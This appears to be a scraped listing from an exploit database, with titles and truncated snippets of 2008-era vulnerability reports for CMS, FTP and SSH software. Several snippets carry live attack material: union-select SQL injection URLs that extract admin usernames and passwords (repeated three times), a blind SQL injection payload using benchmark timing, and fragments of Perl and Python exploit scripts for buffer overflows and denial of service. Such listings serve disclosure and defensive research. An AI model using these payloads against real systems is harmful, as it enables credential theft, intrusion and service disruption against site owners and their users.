BSOD in Win'2k3, Vista x86 and x64 by nonpriviledged user

BSOD or hard system hang due to race condition in win32k. sys code that processes UnhookWindowsHookEx. Reproduced when thread calls many times UnhookWindowsHookEx in the same time with switching active windows desktop object SwitchDesktop from desktop where hooks are unhooked and broadcasting...

TBmnetCMS 1.0 (index.php content) Local File Inclusion Vulnerability

No description provided by source. ------------------------------------------------------------------------------------------------------------- TBmnetCMS v1.0 index.php?content Local File Inclusion Vulnerability http://www.tbmnet.de...

Logz podcast CMS 1.3.1 - 'art' SQL Injection

Logz podcast CMS version 1.3.1 Remote sql inj download: http://sourceforge.net/project/showfiles.php?groupid=107225&packageid=178479&releaseid=635701 ---------------------------------------------------------- Discovered By: ZoRLu Date: 31.10.2008 Home: www.z0rlu.blogspot.com contact:...

Pro Traffic One - poll_results.php SQL Injection

Pro Traffic One - pollresults.php SQL Injection | | Pro Traffic One pollresults.php id Remote SQL Injection Vulnerability | |-------------------- IQ-SecuritY ------------------- | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangelg85atYahooDoTcom | | | | | script :...

freesshd-overflow.txt

freeSSHd rename Buffer Overflow Vulnerability http://www.milw0rm.com/exploits/6800 new; print "+ Connecting...\n"; $ssh2-connect$ip, $port || die "- Unable to connect!\n"; $ssh2-authpassword$user, $pass || "- Incorrect credentials\n"; print "+ Sending payload\n"; my $junk = 'A' x 317; my $eip =...

Dart Communications PowerTCP FTP module - Remote Buffer Overflow

Author: Intel Discovered by: Intel Software: PowerTCP ActiveX Vulnerable Component: DartFtp.dll Version: 2.0.2.0 Website: www.dart.com Description: "PowerTCP tools from Dart Communications are comprehensive tools you can include in your programs to perform common TCP/IP functions, including FTP,...

Dart Communications PowerTCP FTP module - Remote Buffer Overflow

Dart Communications PowerTCP FTP module - Remote Buffer Overflow Author: Intel Discovered by: Intel Software: PowerTCP ActiveX Vulnerable Component: DartFtp.dll Version: 2.0.2.0 Website: www.dart.com Description: "PowerTCP tools from Dart Communications are comprehensive tools you can include in...

Titan FTP server 6.26 build 630 Remote Denial of Service Exploit

No description provided by source. Titan FTP server v6.26 build 630 remote DoS exploit Titan FTP URL - http://www.titanftp.com/ DoS'ed on "SITE WHO" command xdmnt -- coding: windows-1252 -- import socket import sys def helpinfo: print "Usage: titand0s host login password\n" print "Note: anonymous...

ipreg-blindsql.txt

!/usr/bin/perl ----------------------------------------------- IP Reg post$host, username = $param, userpass = 'admin' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpass,$uidz,1=$charz,". "benchmark200000000,char0,". "0 from user where...

FAQ Management Script (catid) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ================================================================ FAQ Management Script catid Remote SQL Injection Vulnerability ================================================================ || | | FAQ Management catid Remote SQL Injecti...

Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling

Esqlanelapse Software Project version: 2.6.1 & 2.6.2 Insecure Cookie Handling Vulnerability donwload: http://sourceforge.net/project/showfiles.php?groupid=118575&packageid=129141&releaseid=519061 ---------------------------------------------------------- Discovered By: ZoRLu Date: 26.09.2008 Home...

Rianxosencabos CMS 0.9 - Arbitrary Add Admin

Rianxosencabos CMS 0.9 - Arbitrary Add Admin ============================================================ Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability ============================================================ ,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CW...

Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability

No description provided by source. ============================================================ Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability ============================================================ ,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH...

Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability

Exploit for unknown platform in category web applications ======================================================== Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability ======================================================== ,--^----------,--------,-----,-------^--, | ||||||||| --------' | O...

TWiki command execution vulnerability

Overview The TWiki wiki software fails to validate input passed to certain URLs. By accessing a URL containing the TWiki configuration script, an attacker may be able to read arbitrary files. Description TWiki is a wiki that is runs in the context of the Apache web server. TWiki is installed by...

Dana IRC 1.4a Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl ksOSe - 08/24/2008 This is a useless and not portable exploit code, tested only on my winxp-sp3 VM. I was looking for a vuln to write an exploit for when I found this PoC: http://www.milw0rm.com/exploits/5817 The author wrote: "The reason why ther...

ccms40-sql.txt

Author: !DoktOR! Date found: 21.08.08 Product: CCMS Gaming Portal Version: 4.0 The price: $55 URL: customcms.net Vulnerability Class: SQL injection print.php Vuln code: $q = mysqlquery"SELECT from ccmsnewscomments WHERE wid='$id'"; magicquotesgpc = Off http://localhost/installdir/ Exploit:...

fipscmslight-sql.txt

Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin http://localhost:2222/lab/cms/admin Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5 Foun...

fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability

No description provided by source. Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin http://localhost:2222/lab/cms/admin...

FipsCMS Light 2.1 - 'r' SQL Injection

Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin http://localhost:2222/lab/cms/admin Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5 Foun...